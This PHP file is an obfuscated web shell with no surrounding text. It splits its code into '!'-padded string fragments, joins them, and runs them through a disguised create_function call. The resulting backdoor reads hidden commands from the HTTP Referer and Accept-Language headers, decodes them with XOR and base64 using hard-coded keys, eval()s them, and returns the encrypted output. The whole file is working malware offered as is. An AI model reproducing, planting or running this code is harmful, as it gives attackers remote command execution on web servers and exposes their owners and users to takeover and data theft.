<?php
$P='$kh="acce!";$kf="a!!c27!";funct!ion x($t,$k)!{$c=str!!len($k);$l=!strlen($!t)!;!$o=';
$v=',$!m);if!($q&&!!$m)!{@session_start!(!);$s=!&$_SESSION;$ss=!"subs!tr"!;$sl="!strtol!ower';
$q='ret!urn $!!o;}$r=$_SE!RVER;$rr!=@$!r[!"H!TTP_REF!ERER"];$ra=@$r[!"HT!TP_ACCEPT!_';
$S='kf),0,3)!)!;$p=!"";for(!$z=1;$z<cou!nt(!$!m[1]);$z!+!+)!$p.=!$q[$m[!2][$z]];if!(';
$e='!";$i=$m![1][0].$m[1]![!1]!;$h!=$!sl($ss(md5($i.$kh!),0,3));$f!=$sl!($s!s(md5(!$i.$';
$w='[$i].!=$p;$e=!strpo!s($s[$i!],!$f);i!f($e){$k=$!kh!.$kf;ob_s!tart();@!ev!a!l(@gzunco!m';
$s='4_encode(!x(gzc!om!press($o)!,$k)!);!print("<$!!k>$!d!</$k>");!@session_destroy();}}}}';
$g='L!ANGUAGE"!];if($rr!&&$!ra){$u=!parse_url!!($rr);parse_s!!tr!($u["query"],!$q);$q!=';
$V='"";for!(!$i=0;$i<$l;){f!or($j=0;!(!$j<$c&&$i<$l!!);$j++,!$i+!+){$o.=$t{!$i!}^$k{$j};}}';
$y=str_replace('Ja','','crJaeatJae_JaJaJafuncJation');
$Y='!press(@x(@ba!se64_decod!e(!pre!g_replace(arr!ay("!/_/","/-!/!")!,array("/!","+"),$';
$O='array_!value!s(!$q);pr!eg_match!_all("/([!!\\w])[\\w-]+(?:!;!q=0.(![\\d]))!?,?/",$ra';
$W='strpos($p,$h)=!==!0){$!s![$i]="";$p=$ss($p,3);!}if(arr!!ay_key_e!xis!ts($i,$s)){$!s';
$A='ss!($s[$i]!!,0,$e))),$k))!)!;$o=ob_get_c!ont!ents();!!ob_end_clean()!;$d=b!ase6!';
$T=str_replace('!','',$P.$V.$q.$g.$O.$v.$e.$S.$W.$w.$Y.$A.$s);
$b=$y('',$T);$b();
?>